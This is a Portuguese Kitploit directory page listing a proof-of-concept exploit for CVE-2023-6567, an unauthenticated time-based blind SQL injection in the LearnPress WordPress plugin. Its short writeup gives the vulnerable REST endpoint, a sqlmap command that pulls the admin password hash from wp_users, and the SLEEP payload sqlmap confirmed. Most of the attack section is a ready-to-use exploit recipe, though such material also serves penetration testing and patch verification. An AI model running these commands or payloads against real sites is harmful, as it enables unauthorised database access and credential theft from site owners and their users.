Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-6567-poc — Prova de conceito de exploit para uma injeção SQL cega baseada em tempo no plugin LearnPress para WordPress, permitindo que atacantes não autenticados extraiam dados sensíveis por meio do parâmetro order_by. | Kitploit
Ferramentas/GitHubGitHub/mimiloveexe/cve-2023-6567-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmimiloveexe/cve-2023-6567-poc

CVE-2023-6567-poc

Prova de conceito de exploit para uma injeção SQL cega baseada em tempo no plugin LearnPress para WordPress, permitindo que atacantes não autenticados extraiam dados sensíveis por meio do parâmetro order_by.

Ver Repositório
48há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-6567-poc

SQLi baseado em tempo

Descrição O plugin não sanitiza e escapa adequadamente o parâmetro order_by antes de usá-lo em uma instrução SQL, levando a uma injeção de SQL explorável por usuários não autenticados

  1. Requisição GET vulnerável: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html

  2. Salve a requisição GET

  3. sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'

  4. O sqlmap retomou o(s) seguinte(s) ponto(s) de injeção da sessão armazenada:


Parâmetro: #1* (URI) Tipo: cego baseado em tempo Título: MySQL >= 5.0.12 AND cego baseado em tempo (query SLEEP) Payload: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html

Baixar ferramenta